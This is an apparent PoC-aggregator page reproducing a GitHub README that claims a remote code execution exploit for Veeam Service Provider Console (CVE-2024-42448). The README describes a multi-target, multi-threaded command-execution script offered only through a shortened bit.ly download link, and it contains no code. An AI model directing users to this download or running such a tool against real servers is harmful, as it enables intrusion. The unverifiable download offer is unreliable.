CVE-2024-42448 PoC — Veeam Service Provider Console 安全漏洞

Source

https://github.com/h3lye/CVE-2024-42448-RCE

Associated Vulnerability

Title:Veeam Service Provider Console 安全漏洞 (CVE-2024-42448)
Description:From the VSPC management agent machine, under condition that the management agent is authorized on the server, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine.

Description

Veeam Service Provider Console (VSPC) remote code execution.

Readme

# CVE-2024-42448-RCE
Veeam Service Provider Console (`VSPC`) remote code execution.

[Download link here](https://bit.ly/4gknFFV)

# Details:
is a critical vulnerability identified in the Veeam Service Provider Console (`VSPC`) with a CVSS score of `9.9.`<br>
This vulnerability allows for remote code execution (`RCE`).<br>

# About:
(`files.zip`) here you'll find the files and including but not limit to tcp packets captured during testing<br>
some progress with `IDA` (which was unnecessary), but will be effective if you try to understand the root cause<br>
and produce a working exploit.<br>
every step is explained clearly with screenshots inside the process.pdf.<br>
for educational purpose only.
</p>

A python script (`CVE-2024-42448.py`) which trigger the vulnerability and execute user supplied command<br>
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>


# Download: [here](https://bit.ly/4gknFFV)

File Snapshot


 [4.0K]  /data/pocs/7068322f7cd9e0c0de9d184310aa9f79108d3496
└── [ 966]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!